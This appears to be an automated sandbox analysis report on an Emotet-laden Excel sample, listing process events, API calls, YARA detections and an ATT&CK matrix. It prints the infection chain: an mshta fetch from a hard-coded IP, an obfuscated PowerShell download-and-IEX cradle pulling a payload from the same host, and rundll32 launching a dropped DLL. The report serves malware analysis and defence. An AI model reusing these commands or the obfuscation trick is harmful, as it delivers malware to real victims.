Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_7299FC60 mov eax, dword ptr fs:[00000030h]	8_2_7299FC60

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729C070F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_729C070F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B3D00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_729B3D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B3D30 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_729B3D30

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X			Jump to behavior

Source: Yara match

File source: ggnlRjkfr4.xls, type: SAMPLE

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://87.251.86.178/pp/oo.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer	Jump to behavior

Source: powershell.exe, 00000005.00000002.665022134.0000000000720000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664849970.0000000000920000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000005.00000002.665022134.0000000000720000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664849970.0000000000920000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: powershell.exe, 00000005.00000002.665022134.0000000000720000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664849970.0000000000920000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_729D125A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_729D1331
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_729D137C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_729D11FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_729C86C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_729D1425
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_729D152D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_729C8BB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_729D0FA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_729D0F0B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_729D0CB1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_729B3E4B cpuid

8_2_729B3E4B

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_729B4AD2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_729B4AD2

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.577830349.0000000000602000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.577733868.0000000000180000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter111	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting11	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery131	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information11	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting11	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Information Discovery134	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ggnlRjkfr4

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails